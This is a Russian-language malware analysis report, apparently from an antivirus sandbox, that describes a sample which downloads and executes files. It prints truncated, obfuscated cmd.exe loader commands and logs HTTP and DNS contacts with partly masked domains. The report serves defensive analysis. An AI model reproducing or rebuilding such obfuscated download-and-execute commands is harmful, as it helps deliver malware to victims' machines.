Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^Fo^R ; , /F ; " tokens= 2 delims=Jf=" , , %^E ; ^In , , ( ; ' ; ASSo^^c , , .cmd ' ; , ) , ^D^o ; , %^E; , 6ygTQn/^v^5^LV ; ; 6Je2P/r " , ; ( (S^et ^ [^;.=^bnE:y^oL^...
Сетевая активность
Подключается к
- 'gu#o.hu':80
- 'de##alo.pt':80
TCP
Запросы HTTP GET
- http://www.gu#o.hu/bSGADpL/
- http://www.de##alo.pt/K7Uk/
UDP
- DNS ASK al######organisation.com
- DNS ASK mi####vka-school.ru
- DNS ASK va####inesday.bid
- DNS ASK gu#o.hu
- DNS ASK de##alo.pt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^Fo^R ; , /F ; " tokens= 2 delims=Jf=" , , %^E ; ^In , , ( ; ' ; ASSo^^c , , .cmd ' ; , ) , ^D^o ; , %^E; , 6ygTQn/^v^5^LV ; ; 6Je2P/r " , ; ( (S^et ^ [^;.=^bnE:y^oL^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ASSo^c .cmd
- '<SYSTEM32>\cmd.exe' ; , 6ygTQn/v5LV ; ; 6Je2P/r " , ; ( (S^et ^ [^;.=^bnE:y^oL^;^adUxpI6^Z}^@fteWlBj-qG=$^K7c^s'A{Dk^)^m1S^v/^gFP^r^3\+w Ou^C.,^(hN8i) , )&& ; , F^O^r , %^t , ^IN ; ( ^ +12 ^ 5 ^;...
